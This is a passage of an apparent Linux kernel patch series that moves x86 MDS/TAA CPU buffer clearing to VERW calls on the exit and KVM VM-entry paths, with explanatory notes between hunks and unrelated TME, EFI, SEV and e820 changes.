++	.word __KERNEL_DS
++.align L1_CACHE_BYTES, 0xcc
++SYM_CODE_END(mds_verw_sel);
++/* For KVM */
++EXPORT_SYMBOL_GPL(mds_verw_sel);
++
++.popsection
++
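
With mds_verw_sel exported, the buffer-clearing VERW can be issued from
C as well as from the CLEAR_CPU_BUFFERS asm macro. A minimal sketch
mirroring the mds_clear_cpu_buffers() pattern (only the memory-operand
form of VERW clears the buffers):

    extern u16 mds_verw_sel;

    static __always_inline void clear_cpu_buffers(void)
    {
        /* memory-operand VERW; clobbers only CFLAGS.ZF */
        asm volatile("verw %[sel]" : : [sel] "m" (mds_verw_sel) : "cc");
    }
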
+diff --git a/arch/x86/entry/entry_32.S b/arch/x86/entry/entry_32.S
+index e309e71560389..ee5def1060c86 100644
+--- a/arch/x86/entry/entry_32.S
++++ b/arch/x86/entry/entry_32.S
+@@ -912,6 +912,7 @@ SYM_FUNC_START(entry_SYSENTER_32)
+ 	BUG_IF_WRONG_CR3 no_user_check=1
+ 	popfl
+ 	popl	%eax
++	CLEAR_CPU_BUFFERS
+ 
+ 	/*
+ 	 * Return back to the vDSO, which will pop ecx and edx.
+@@ -981,6 +982,7 @@ restore_all_switch_stack:
+ 
+ 	/* Restore user state */
+ 	RESTORE_REGS pop=4			# skip orig_eax/error_code
++	CLEAR_CPU_BUFFERS
+ .Lirq_return:
+ 	/*
+ 	 * ARCH_HAS_MEMBARRIER_SYNC_CORE rely on IRET core serialization
+@@ -1173,6 +1175,7 @@ SYM_CODE_START(asm_exc_nmi)
+ 
+ 	/* Not on SYSENTER stack. */
+ 	call	exc_nmi
++	CLEAR_CPU_BUFFERS
+ 	jmp	.Lnmi_return
+ 
+ .Lnmi_from_sysenter_stack:
+diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
+index 9953d966d1244..c2383c2880ec6 100644
+--- a/arch/x86/entry/entry_64.S
++++ b/arch/x86/entry/entry_64.S
+@@ -223,6 +223,7 @@ syscall_return_via_sysret:
+ SYM_INNER_LABEL(entry_SYSRETQ_unsafe_stack, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+ 	swapgs
++	CLEAR_CPU_BUFFERS
+ 	sysretq
+ SYM_INNER_LABEL(entry_SYSRETQ_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+@@ -656,6 +657,7 @@ SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
+ 	/* Restore RDI. */
+ 	popq	%rdi
+ 	swapgs
++	CLEAR_CPU_BUFFERS
+ 	jmp	.Lnative_iret
+ 
+ 
+@@ -767,6 +769,8 @@ native_irq_return_ldt:
+ 	 */
+ 	popq	%rax				/* Restore user RAX */
+ 
++	CLEAR_CPU_BUFFERS
++
+ 	/*
+ 	 * RSP now points to an ordinary IRET frame, except that the page
+ 	 * is read-only and RSP[31:16] are preloaded with the userspace
+@@ -1493,6 +1497,12 @@ nmi_restore:
+ 	std
+ 	movq	$0, 5*8(%rsp)		/* clear "NMI executing" */
+ 
++	/*
++	 * Skip CLEAR_CPU_BUFFERS here, since it only helps in rare cases like
++	 * NMI in kernel after user state is restored. For an unprivileged user
++	 * these conditions are hard to meet.
++	 */
++
+ 	/*
+ 	 * iretq reads the "iret" frame and exits the NMI stack in a
+ 	 * single instruction.  We are returning to kernel mode, so this
+@@ -1511,6 +1521,7 @@ SYM_CODE_START(ignore_sysret)
+ 	UNWIND_HINT_EMPTY
+ 	ENDBR
+ 	mov	$-ENOSYS, %eax
++	CLEAR_CPU_BUFFERS
+ 	sysretl
+ SYM_CODE_END(ignore_sysret)
+ #endif
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index d6c08d8986b17..4bcd009a232bf 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -272,6 +272,7 @@ SYM_INNER_LABEL(entry_SYSRETL_compat_unsafe_stack, SYM_L_GLOBAL)
+ 	xorl	%r9d, %r9d
+ 	xorl	%r10d, %r10d
+ 	swapgs
++	CLEAR_CPU_BUFFERS
+ 	sysretl
+ SYM_INNER_LABEL(entry_SYSRETL_compat_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+diff --git a/arch/x86/include/asm/boot.h b/arch/x86/include/asm/boot.h
+index 215d37f7dde8a..a38cc0afc90a0 100644
+--- a/arch/x86/include/asm/boot.h
++++ b/arch/x86/include/asm/boot.h
+@@ -79,4 +79,14 @@
+ # define BOOT_STACK_SIZE	0x1000
+ #endif
+ 
++#ifndef __ASSEMBLY__
++extern unsigned int output_len;
++extern const unsigned long kernel_total_size;
++
++unsigned long decompress_kernel(unsigned char *outbuf, unsigned long virt_addr,
++				void (*error)(char *x));
++
++extern struct boot_params *boot_params_ptr;
++#endif
++
+ #endif /* _ASM_X86_BOOT_H */
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b122708792c4d..b60f24b30cb90 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -304,7 +304,7 @@
+ #define X86_FEATURE_UNRET		(11*32+15) /* "" AMD BTB untrain return */
+ #define X86_FEATURE_USE_IBPB_FW		(11*32+16) /* "" Use IBPB during runtime firmware calls */
+ #define X86_FEATURE_RSB_VMEXIT_LITE	(11*32+17) /* "" Fill RSB on VM exit when EIBRS is enabled */
+-
++#define X86_FEATURE_CLEAR_CPU_BUF	(11*32+18) /* "" Clear CPU buffers using VERW */
+ 
+ #define X86_FEATURE_MSR_TSX_CTRL	(11*32+20) /* "" MSR IA32_TSX_CTRL (Intel) implemented */
+ 
+diff --git a/arch/x86/include/asm/efi.h b/arch/x86/include/asm/efi.h
+index 233ae6986d6f2..e601264b1a243 100644
+--- a/arch/x86/include/asm/efi.h
++++ b/arch/x86/include/asm/efi.h
+@@ -88,6 +88,8 @@ static inline void efi_fpu_end(void)
+ }
+ 
+ #ifdef CONFIG_X86_32
++#define EFI_X86_KERNEL_ALLOC_LIMIT		(SZ_512M - 1)
++
+ #define arch_efi_call_virt_setup()					\
+ ({									\
+ 	efi_fpu_begin();						\
+@@ -101,8 +103,7 @@ static inline void efi_fpu_end(void)
+ })
+ 
+ #else /* !CONFIG_X86_32 */
+-
+-#define EFI_LOADER_SIGNATURE	"EL64"
++#define EFI_X86_KERNEL_ALLOC_LIMIT		EFI_ALLOC_LIMIT
+ 
+ extern asmlinkage u64 __efi_call(void *fp, ...);
+ 
+@@ -214,6 +215,8 @@ efi_status_t efi_set_virtual_address_map(unsigned long memory_map_size,
+ 
+ #ifdef CONFIG_EFI_MIXED
+ 
++#define EFI_ALLOC_LIMIT		(efi_is_64bit() ? ULONG_MAX : U32_MAX)
++
+ #define ARCH_HAS_EFISTUB_WRAPPERS
+ 
+ static inline bool efi_is_64bit(void)
+@@ -325,6 +328,13 @@ static inline u32 efi64_convert_status(efi_status_t status)
+ #define __efi64_argmap_set_memory_space_attributes(phys, size, flags) \
+ 	(__efi64_split(phys), __efi64_split(size), __efi64_split(flags))
+ 
++/* Memory Attribute Protocol */
++#define __efi64_argmap_set_memory_attributes(protocol, phys, size, flags) \
++	((protocol), __efi64_split(phys), __efi64_split(size), __efi64_split(flags))
++
++#define __efi64_argmap_clear_memory_attributes(protocol, phys, size, flags) \
++	((protocol), __efi64_split(phys), __efi64_split(size), __efi64_split(flags))
++
+ /*
+  * The macros below handle the plumbing for the argument mapping. To add a
+  * mapping for a specific EFI method, simply define a macro
+diff --git a/arch/x86/include/asm/entry-common.h b/arch/x86/include/asm/entry-common.h
+index 11203a9fe0a87..ffe72790ceafd 100644
+--- a/arch/x86/include/asm/entry-common.h
++++ b/arch/x86/include/asm/entry-common.h
+@@ -91,7 +91,6 @@ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ 
+ static __always_inline void arch_exit_to_user_mode(void)
+ {
+-	mds_user_clear_cpu_buffers();
+ 	amd_clear_divider();
+ }
+ #define arch_exit_to_user_mode arch_exit_to_user_mode
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index d3706de91a934..8f6f17a8617b6 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -194,6 +194,19 @@
+ #endif
+ .endm
+ 
++/*
++ * Macro to execute the VERW instruction, which mitigates transient data
++ * sampling attacks such as MDS. On affected systems a microcode update
++ * overloaded VERW to also clear the CPU buffers. VERW clobbers CFLAGS.ZF.
++ *
++ * Note: Only the memory operand variant of VERW clears the CPU buffers.
++ */
++.macro CLEAR_CPU_BUFFERS
++	ALTERNATIVE "jmp .Lskip_verw_\@", "", X86_FEATURE_CLEAR_CPU_BUF
++	verw _ASM_RIP(mds_verw_sel)
++.Lskip_verw_\@:
++.endm
++
+ #else /* __ASSEMBLY__ */
+ 
+ #define ANNOTATE_RETPOLINE_SAFE					\
+@@ -368,13 +381,14 @@ DECLARE_STATIC_KEY_FALSE(switch_to_cond_stibp);
+ DECLARE_STATIC_KEY_FALSE(switch_mm_cond_ibpb);
+ DECLARE_STATIC_KEY_FALSE(switch_mm_always_ibpb);
+ 
+-DECLARE_STATIC_KEY_FALSE(mds_user_clear);
+ DECLARE_STATIC_KEY_FALSE(mds_idle_clear);
+ 
+ DECLARE_STATIC_KEY_FALSE(switch_mm_cond_l1d_flush);
+ 
+ DECLARE_STATIC_KEY_FALSE(mmio_stale_data_clear);
+ 
++extern u16 mds_verw_sel;
++
+ #include <asm/segment.h>
+ 
+ /**
+@@ -400,17 +414,6 @@ static __always_inline void mds_clear_cpu_buffers(void)
+ 	asm volatile("verw %[ds]" : : [ds] "m" (ds) : "cc");
+ }
+ 
+-/**
+- * mds_user_clear_cpu_buffers - Mitigation for MDS and TAA vulnerability
+- *
+- * Clear CPU buffers if the corresponding static key is enabled
+- */
+-static __always_inline void mds_user_clear_cpu_buffers(void)
+-{
+-	if (static_branch_likely(&mds_user_clear))
+-		mds_clear_cpu_buffers();
+-}
+-
+ /**
+  * mds_idle_clear_cpu_buffers - Mitigation for MDS vulnerability
+  *
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index 7ca5c9ec8b52e..cf98fc28601fb 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -157,6 +157,7 @@ static __always_inline void sev_es_nmi_complete(void)
+ 		__sev_es_nmi_complete();
+ }
+ extern int __init sev_es_efi_map_ghcbs(pgd_t *pgd);
++extern void sev_enable(struct boot_params *bp);
+ 
+ static inline int rmpadjust(unsigned long vaddr, bool rmp_psize, unsigned long attrs)
+ {
+@@ -202,12 +203,15 @@ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
+ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
++u64 snp_get_unsupported_features(u64 status);
++u64 sev_get_status(void);
+ #else
+ static inline void sev_es_ist_enter(struct pt_regs *regs) { }
+ static inline void sev_es_ist_exit(void) { }
+ static inline int sev_es_setup_ap_jump_table(struct real_mode_header *rmh) { return 0; }
+ static inline void sev_es_nmi_complete(void) { }
+ static inline int sev_es_efi_map_ghcbs(pgd_t *pgd) { return 0; }
++static inline void sev_enable(struct boot_params *bp) { }
+ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate) { return 0; }
+ static inline int rmpadjust(unsigned long vaddr, bool rmp_psize, unsigned long attrs) { return 0; }
+ static inline void setup_ghcb(void) { }
+@@ -225,6 +229,9 @@ static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *in
+ {
+ 	return -ENOTTY;
+ }
++
++static inline u64 snp_get_unsupported_features(u64 status) { return 0; }
++static inline u64 sev_get_status(void) { return 0; }
+ #endif
+ 
+ #endif
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 13dffc43ded02..d1895930e6eb8 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -110,9 +110,6 @@ DEFINE_STATIC_KEY_FALSE(switch_mm_cond_ibpb);
+ /* Control unconditional IBPB in switch_mm() */
+ DEFINE_STATIC_KEY_FALSE(switch_mm_always_ibpb);
+ 
+-/* Control MDS CPU buffer clear before returning to user space */
+-DEFINE_STATIC_KEY_FALSE(mds_user_clear);
+-EXPORT_SYMBOL_GPL(mds_user_clear);
+ /* Control MDS CPU buffer clear before idling (halt, mwait) */
+ DEFINE_STATIC_KEY_FALSE(mds_idle_clear);
+ EXPORT_SYMBOL_GPL(mds_idle_clear);
+@@ -251,7 +248,7 @@ static void __init mds_select_mitigation(void)
+ 		if (!boot_cpu_has(X86_FEATURE_MD_CLEAR))
+ 			mds_mitigation = MDS_MITIGATION_VMWERV;
+ 
+-		static_branch_enable(&mds_user_clear);
++		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 
+ 		if (!boot_cpu_has(X86_BUG_MSBDS_ONLY) &&
+ 		    (mds_nosmt || cpu_mitigations_auto_nosmt()))
+@@ -355,7 +352,7 @@ static void __init taa_select_mitigation(void)
+ 	 * For guests that can't determine whether the correct microcode is
+ 	 * present on host, enable the mitigation for UCODE_NEEDED as well.
+ 	 */
+-	static_branch_enable(&mds_user_clear);
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 
+ 	if (taa_nosmt || cpu_mitigations_auto_nosmt())
+ 		cpu_smt_disable(false);
+@@ -423,7 +420,7 @@ static void __init mmio_select_mitigation(void)
+ 	 */
+ 	if (boot_cpu_has_bug(X86_BUG_MDS) || (boot_cpu_has_bug(X86_BUG_TAA) &&
+ 					      boot_cpu_has(X86_FEATURE_RTM)))
+-		static_branch_enable(&mds_user_clear);
++		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 	else
+ 		static_branch_enable(&mmio_stale_data_clear);
+ 
+@@ -483,12 +480,12 @@ static void __init md_clear_update_mitigation(void)
+ 	if (cpu_mitigations_off())
+ 		return;
+ 
+-	if (!static_key_enabled(&mds_user_clear))
++	if (!boot_cpu_has(X86_FEATURE_CLEAR_CPU_BUF))
+ 		goto out;
+ 
+ 	/*
+-	 * mds_user_clear is now enabled. Update MDS, TAA and MMIO Stale Data
+-	 * mitigation, if necessary.
++	 * X86_FEATURE_CLEAR_CPU_BUF is now enabled. Update MDS, TAA and MMIO
++	 * Stale Data mitigation, if necessary.
+ 	 */
+ 	if (mds_mitigation == MDS_MITIGATION_OFF &&
+ 	    boot_cpu_has_bug(X86_BUG_MDS)) {
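
The replacement pattern in this file is worth spelling out: instead of
flipping a static key at runtime, the select functions force a synthetic
CPU feature bit, which both C checks and the entry-path ALTERNATIVE can
key off. A hedged sketch using the real kernel helpers:

    /* at mitigation-select time */
    setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);

    /* later, anywhere in C */
    if (boot_cpu_has(X86_FEATURE_CLEAR_CPU_BUF))
        pr_info("VERW-based CPU buffer clearing is active\n");
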
+diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
+index 4278996504833..32bd640170475 100644
+--- a/arch/x86/kernel/cpu/intel.c
++++ b/arch/x86/kernel/cpu/intel.c
+@@ -216,6 +216,90 @@ int intel_cpu_collect_info(struct ucode_cpu_info *uci)
+ }
+ EXPORT_SYMBOL_GPL(intel_cpu_collect_info);
+ 
++#define MSR_IA32_TME_ACTIVATE		0x982
++
++/* Helpers to access TME_ACTIVATE MSR */
++#define TME_ACTIVATE_LOCKED(x)		(x & 0x1)
++#define TME_ACTIVATE_ENABLED(x)		(x & 0x2)
++
++#define TME_ACTIVATE_POLICY(x)		((x >> 4) & 0xf)	/* Bits 7:4 */
++#define TME_ACTIVATE_POLICY_AES_XTS_128	0
++
++#define TME_ACTIVATE_KEYID_BITS(x)	((x >> 32) & 0xf)	/* Bits 35:32 */
++
++#define TME_ACTIVATE_CRYPTO_ALGS(x)	((x >> 48) & 0xffff)	/* Bits 63:48 */
++#define TME_ACTIVATE_CRYPTO_AES_XTS_128	1
++
++/* Values for mktme_status (SW only construct) */
++#define MKTME_ENABLED			0
++#define MKTME_DISABLED			1
++#define MKTME_UNINITIALIZED		2
++static int mktme_status = MKTME_UNINITIALIZED;
++
++static void detect_tme_early(struct cpuinfo_x86 *c)
++{
++	u64 tme_activate, tme_policy, tme_crypto_algs;
++	int keyid_bits = 0, nr_keyids = 0;
++	static u64 tme_activate_cpu0 = 0;
++
++	rdmsrl(MSR_IA32_TME_ACTIVATE, tme_activate);
++
++	if (mktme_status != MKTME_UNINITIALIZED) {
++		if (tme_activate != tme_activate_cpu0) {
++			/* Broken BIOS? */
++			pr_err_once("x86/tme: configuration is inconsistent between CPUs\n");
++			pr_err_once("x86/tme: MKTME is not usable\n");
++			mktme_status = MKTME_DISABLED;
++
++			/* Proceed. We may need to exclude bits from x86_phys_bits. */
++		}
++	} else {
++		tme_activate_cpu0 = tme_activate;
++	}
++
++	if (!TME_ACTIVATE_LOCKED(tme_activate) || !TME_ACTIVATE_ENABLED(tme_activate)) {
++		pr_info_once("x86/tme: not enabled by BIOS\n");
++		mktme_status = MKTME_DISABLED;
++		return;
++	}
++
++	if (mktme_status != MKTME_UNINITIALIZED)
++		goto detect_keyid_bits;
++
++	pr_info("x86/tme: enabled by BIOS\n");
++
++	tme_policy = TME_ACTIVATE_POLICY(tme_activate);
++	if (tme_policy != TME_ACTIVATE_POLICY_AES_XTS_128)
++		pr_warn("x86/tme: Unknown policy is active: %#llx\n", tme_policy);
++
++	tme_crypto_algs = TME_ACTIVATE_CRYPTO_ALGS(tme_activate);
++	if (!(tme_crypto_algs & TME_ACTIVATE_CRYPTO_AES_XTS_128)) {
++		pr_err("x86/mktme: No known encryption algorithm is supported: %#llx\n",
++				tme_crypto_algs);
++		mktme_status = MKTME_DISABLED;
++	}
++detect_keyid_bits:
++	keyid_bits = TME_ACTIVATE_KEYID_BITS(tme_activate);
++	nr_keyids = (1UL << keyid_bits) - 1;
++	if (nr_keyids) {
++		pr_info_once("x86/mktme: enabled by BIOS\n");
++		pr_info_once("x86/mktme: %d KeyIDs available\n", nr_keyids);
++	} else {
++		pr_info_once("x86/mktme: disabled by BIOS\n");
++	}
++
++	if (mktme_status == MKTME_UNINITIALIZED) {
++		/* MKTME is usable */
++		mktme_status = MKTME_ENABLED;
++	}
++
++	/*
++	 * KeyID bits effectively lower the number of physical address
++	 * bits.  Update cpuinfo_x86::x86_phys_bits accordingly.
++	 */
++	c->x86_phys_bits -= keyid_bits;
++}
++
+ static void early_init_intel(struct cpuinfo_x86 *c)
+ {
+ 	u64 misc_enable;
+@@ -367,6 +451,13 @@ static void early_init_intel(struct cpuinfo_x86 *c)
+ 	 */
+ 	if (detect_extended_topology_early(c) < 0)
+ 		detect_ht_early(c);
++
++	/*
++	 * Adjust the number of physical bits early because it affects the
++	 * valid bits of the MTRR mask registers.
++	 */
++	if (cpu_has(c, X86_FEATURE_TME))
++		detect_tme_early(c);
+ }
+ 
+ static void bsp_init_intel(struct cpuinfo_x86 *c)
+@@ -527,90 +618,6 @@ static void srat_detect_node(struct cpuinfo_x86 *c)
+ #endif
+ }
+ 
+-#define MSR_IA32_TME_ACTIVATE		0x982
+-
+-/* Helpers to access TME_ACTIVATE MSR */
+-#define TME_ACTIVATE_LOCKED(x)		(x & 0x1)
+-#define TME_ACTIVATE_ENABLED(x)		(x & 0x2)
+-
+-#define TME_ACTIVATE_POLICY(x)		((x >> 4) & 0xf)	/* Bits 7:4 */
+-#define TME_ACTIVATE_POLICY_AES_XTS_128	0
+-
+-#define TME_ACTIVATE_KEYID_BITS(x)	((x >> 32) & 0xf)	/* Bits 35:32 */
+-
+-#define TME_ACTIVATE_CRYPTO_ALGS(x)	((x >> 48) & 0xffff)	/* Bits 63:48 */
+-#define TME_ACTIVATE_CRYPTO_AES_XTS_128	1
+-
+-/* Values for mktme_status (SW only construct) */
+-#define MKTME_ENABLED			0
+-#define MKTME_DISABLED			1
+-#define MKTME_UNINITIALIZED		2
+-static int mktme_status = MKTME_UNINITIALIZED;
+-
+-static void detect_tme(struct cpuinfo_x86 *c)
+-{
+-	u64 tme_activate, tme_policy, tme_crypto_algs;
+-	int keyid_bits = 0, nr_keyids = 0;
+-	static u64 tme_activate_cpu0 = 0;
+-
+-	rdmsrl(MSR_IA32_TME_ACTIVATE, tme_activate);
+-
+-	if (mktme_status != MKTME_UNINITIALIZED) {
+-		if (tme_activate != tme_activate_cpu0) {
+-			/* Broken BIOS? */
+-			pr_err_once("x86/tme: configuration is inconsistent between CPUs\n");
+-			pr_err_once("x86/tme: MKTME is not usable\n");
+-			mktme_status = MKTME_DISABLED;
+-
+-			/* Proceed. We may need to exclude bits from x86_phys_bits. */
+-		}
+-	} else {
+-		tme_activate_cpu0 = tme_activate;
+-	}
+-
+-	if (!TME_ACTIVATE_LOCKED(tme_activate) || !TME_ACTIVATE_ENABLED(tme_activate)) {
+-		pr_info_once("x86/tme: not enabled by BIOS\n");
+-		mktme_status = MKTME_DISABLED;
+-		return;
+-	}
+-
+-	if (mktme_status != MKTME_UNINITIALIZED)
+-		goto detect_keyid_bits;
+-
+-	pr_info("x86/tme: enabled by BIOS\n");
+-
+-	tme_policy = TME_ACTIVATE_POLICY(tme_activate);
+-	if (tme_policy != TME_ACTIVATE_POLICY_AES_XTS_128)
+-		pr_warn("x86/tme: Unknown policy is active: %#llx\n", tme_policy);
+-
+-	tme_crypto_algs = TME_ACTIVATE_CRYPTO_ALGS(tme_activate);
+-	if (!(tme_crypto_algs & TME_ACTIVATE_CRYPTO_AES_XTS_128)) {
+-		pr_err("x86/mktme: No known encryption algorithm is supported: %#llx\n",
+-				tme_crypto_algs);
+-		mktme_status = MKTME_DISABLED;
+-	}
+-detect_keyid_bits:
+-	keyid_bits = TME_ACTIVATE_KEYID_BITS(tme_activate);
+-	nr_keyids = (1UL << keyid_bits) - 1;
+-	if (nr_keyids) {
+-		pr_info_once("x86/mktme: enabled by BIOS\n");
+-		pr_info_once("x86/mktme: %d KeyIDs available\n", nr_keyids);
+-	} else {
+-		pr_info_once("x86/mktme: disabled by BIOS\n");
+-	}
+-
+-	if (mktme_status == MKTME_UNINITIALIZED) {
+-		/* MKTME is usable */
+-		mktme_status = MKTME_ENABLED;
+-	}
+-
+-	/*
+-	 * KeyID bits effectively lower the number of physical address
+-	 * bits.  Update cpuinfo_x86::x86_phys_bits accordingly.
+-	 */
+-	c->x86_phys_bits -= keyid_bits;
+-}
+-
+ static void init_cpuid_fault(struct cpuinfo_x86 *c)
+ {
+ 	u64 msr;
+@@ -747,9 +754,6 @@ static void init_intel(struct cpuinfo_x86 *c)
+ 
+ 	init_ia32_feat_ctl(c);
+ 
+-	if (cpu_has(c, X86_FEATURE_TME))
+-		detect_tme(c);
+-
+ 	init_intel_misc_features(c);
+ 
+ 	split_lock_init();
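
A worked example of the decode performed by detect_tme_early(), using
the helper macros introduced above on a hypothetical MSR value:

    /* hypothetical MSR_IA32_TME_ACTIVATE value; decode with the helpers */
    u64 tme_activate = 0x0001000600000003ULL;

    /* TME_ACTIVATE_LOCKED()      -> 1 (bit 0 set)            */
    /* TME_ACTIVATE_ENABLED()     -> nonzero (bit 1 set)      */
    /* TME_ACTIVATE_POLICY()      -> 0, i.e. AES-XTS-128      */
    /* TME_ACTIVATE_CRYPTO_ALGS() -> 1, AES-XTS-128 supported */

    int keyid_bits = TME_ACTIVATE_KEYID_BITS(tme_activate);   /* 6 */
    int nr_keyids  = (1 << keyid_bits) - 1;                   /* 63 */

    /* c->x86_phys_bits -= keyid_bits: e.g. 46 -> 40 */
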
+diff --git a/arch/x86/kernel/e820.c b/arch/x86/kernel/e820.c
+index 9dac24680ff8e..993734e96615a 100644
+--- a/arch/x86/kernel/e820.c
++++ b/arch/x86/kernel/e820.c
+@@ -1017,10 +1017,12 @@ void __init e820__reserve_setup_data(void)
+ 		e820__range_update(pa_data, sizeof(*data)+data->len, E820_TYPE_RAM, E820_TYPE_RESERVED_KERN);
+ 
+ 		/*
+-		 * SETUP_EFI and SETUP_IMA are supplied by kexec and do not need
+-		 * to be reserved.
++		 * SETUP_EFI, SETUP_IMA and SETUP_RNG_SEED are supplied by
++		 * kexec and do not need to be reserved.
+ 		 */
+-		if (data->type != SETUP_EFI && data->type != SETUP_IMA)
++		if (data->type != SETUP_EFI &&
++		    data->type != SETUP_IMA &&
++		    data->type != SETUP_RNG_SEED)
+ 			e820__range_update_kexec(pa_data,
+ 						 sizeof(*data) + data->len,
+ 						 E820_TYPE_RAM, E820_TYPE_RESERVED_KERN);
+diff --git a/arch/x86/kernel/nmi.c b/arch/x86/kernel/nmi.c
+index cec0bfa3bc04f..ed6cce6c39504 100644
+--- a/arch/x86/kernel/nmi.c
++++ b/arch/x86/kernel/nmi.c
+@@ -522,9 +522,6 @@ DEFINE_IDTENTRY_RAW(exc_nmi)
+ 		write_cr2(this_cpu_read(nmi_cr2));
+ 	if (this_cpu_dec_return(nmi_state))
+ 		goto nmi_restart;
+-
+-	if (user_mode(regs))
+-		mds_user_clear_cpu_buffers();
+ }
+ 
+ #if defined(CONFIG_X86_64) && IS_ENABLED(CONFIG_KVM_INTEL)
+diff --git a/arch/x86/kvm/vmx/run_flags.h b/arch/x86/kvm/vmx/run_flags.h
+index edc3f16cc1896..6a9bfdfbb6e59 100644
+--- a/arch/x86/kvm/vmx/run_flags.h
++++ b/arch/x86/kvm/vmx/run_flags.h
+@@ -2,7 +2,10 @@
+ #ifndef __KVM_X86_VMX_RUN_FLAGS_H
+ #define __KVM_X86_VMX_RUN_FLAGS_H
+ 
+-#define VMX_RUN_VMRESUME	(1 << 0)
+-#define VMX_RUN_SAVE_SPEC_CTRL	(1 << 1)
++#define VMX_RUN_VMRESUME_SHIFT		0
++#define VMX_RUN_SAVE_SPEC_CTRL_SHIFT	1
++
++#define VMX_RUN_VMRESUME		BIT(VMX_RUN_VMRESUME_SHIFT)
++#define VMX_RUN_SAVE_SPEC_CTRL		BIT(VMX_RUN_SAVE_SPEC_CTRL_SHIFT)
+ 
+ #endif /* __KVM_X86_VMX_RUN_FLAGS_H */
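
The switch from bare masks to shift-derived constants is what enables
the bt instruction in the vmenter.S hunk that follows: bt takes a bit
index rather than a mask and reports the result in CF, and CF, unlike
the ZF that testb sets, survives the VERW issued by CLEAR_CPU_BUFFERS.
In outline (a sketch, with resume() as a stand-in):

    /* C sites keep testing the mask form: */
    if (flags & VMX_RUN_VMRESUME)
        resume();  /* stand-in for the vmresume path */

    /* asm sites use the shift so the pending condition lands in CF:
     *
     *   bt   $VMX_RUN_VMRESUME_SHIFT, %bx    ; sets CF
     *   ...  CLEAR_CPU_BUFFERS               ; clobbers ZF, not CF
     *   jnc  .Lvmlaunch                      ; CF still valid here
     */
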
+diff --git a/arch/x86/kvm/vmx/vmenter.S b/arch/x86/kvm/vmx/vmenter.S
+index 0b5db4de4d09e..0b2cad66dee12 100644
+--- a/arch/x86/kvm/vmx/vmenter.S
++++ b/arch/x86/kvm/vmx/vmenter.S
+@@ -106,7 +106,7 @@ SYM_FUNC_START(__vmx_vcpu_run)
+ 	mov (%_ASM_SP), %_ASM_AX
+ 
+ 	/* Check if vmlaunch or vmresume is needed */
+-	testb $VMX_RUN_VMRESUME, %bl
++	bt   $VMX_RUN_VMRESUME_SHIFT, %bx
+ 
+ 	/* Load guest registers.  Don't clobber flags. */
+ 	mov VCPU_RCX(%_ASM_AX), %_ASM_CX
+@@ -128,8 +128,11 @@ SYM_FUNC_START(__vmx_vcpu_run)
+ 	/* Load guest RAX.  This kills the @regs pointer! */
+ 	mov VCPU_RAX(%_ASM_AX), %_ASM_AX
+ 
+-	/* Check EFLAGS.ZF from 'testb' above */
+-	jz .Lvmlaunch
++	/* Clobbers EFLAGS.ZF */
++	CLEAR_CPU_BUFFERS
++
++	/* Check EFLAGS.CF from the VMX_RUN_VMRESUME bit test above. */
++	jnc .Lvmlaunch
+ 
+ 	/*
+ 	 * After a successful VMRESUME/VMLAUNCH, control flow "magically"
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 57c1374fdfd49..5c1590855ffcd 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -407,7 +407,8 @@ static __always_inline void vmx_enable_fb_clear(struct vcpu_vmx *vmx)
+ 
+ static void vmx_update_fb_clear_dis(struct kvm_vcpu *vcpu, struct vcpu_vmx *vmx)
+ {
+-	vmx->disable_fb_clear = vmx_fb_clear_ctrl_available;
++	vmx->disable_fb_clear = !cpu_feature_enabled(X86_FEATURE_CLEAR_CPU_BUF) &&
++		vmx_fb_clear_ctrl_available;
+ 
+ 	/*
+ 	 * If guest will not execute VERW, there is no need to set FB_CLEAR_DIS
+@@ -7120,11 +7121,14 @@ static noinstr void vmx_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+ {
+ 	guest_state_enter_irqoff();
+ 
+-	/* L1D Flush includes CPU buffer clear to mitigate MDS */
++	/*
++	 * L1D Flush includes CPU buffer clear to mitigate MDS, but VERW
++	 * mitigation for MDS is done late in VMentry and is still
++	 * executed in spite of L1D Flush. This is because an extra VERW
++	 * should not matter much after the big hammer L1D Flush.
++	 */
+ 	if (static_branch_unlikely(&vmx_l1d_should_flush))
+ 		vmx_l1d_flush(vcpu);
+-	else if (static_branch_unlikely(&mds_user_clear))
+-		mds_clear_cpu_buffers();
+ 	else if (static_branch_unlikely(&mmio_stale_data_clear) &&
